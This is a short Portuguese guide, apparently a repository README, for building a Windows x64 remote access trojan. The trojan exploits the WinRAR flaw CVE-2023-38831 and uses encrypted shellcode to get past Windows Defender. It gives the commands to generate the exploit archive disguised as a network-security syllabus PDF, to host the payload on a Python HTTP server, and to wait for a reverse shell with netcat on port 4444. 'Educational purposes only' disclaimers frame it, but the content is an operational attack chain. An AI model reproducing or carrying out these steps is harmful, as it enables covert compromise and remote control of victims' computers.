
Trojan de Acesso Remoto (RAT) para Windows x64 usando uma combinação da vulnerabilidade CVE-2023-38831 (vulnerabilidade WinRAR < 6.23) e técnica de exploração de shellcode.
Desenvolver um RAT Windows x64 usando CVE-2023-38831 (WinRAR < 6.23) e exploração de Shellcode para contornar o Windows Defender.
Aviso: Esta informação é apenas para fins educacionais. O uso não autorizado dessas técnicas é ilegal e antiético.
Criar Shellcode
51721.py para gerar o shellcode inicial.Modificar e Compilar o Shellcode
Criptografar o Executável
decrypt_file.ps1 para criptografar o executável compilado:
.\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
Criar um Arquivo WinRAR
cve-2023-38831-exp-gen.py para criar o arquivo:
python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
Configurar um Servidor Python para Download de Arquivos
enc_main.exe e decrypt_file.ps1.python3 -m http.server 8000
Preparar para Ouvir o Shell TCP Reverso
nc -lnvp 4444
Acionar o Shell TCP Reverso
Esta informação é fornecida apenas para fins educacionais. O uso deste exploit sem permissão explícita é ilegal e antiético. O autor não assume nenhuma responsabilidade por qualquer uso inadequado desta informação.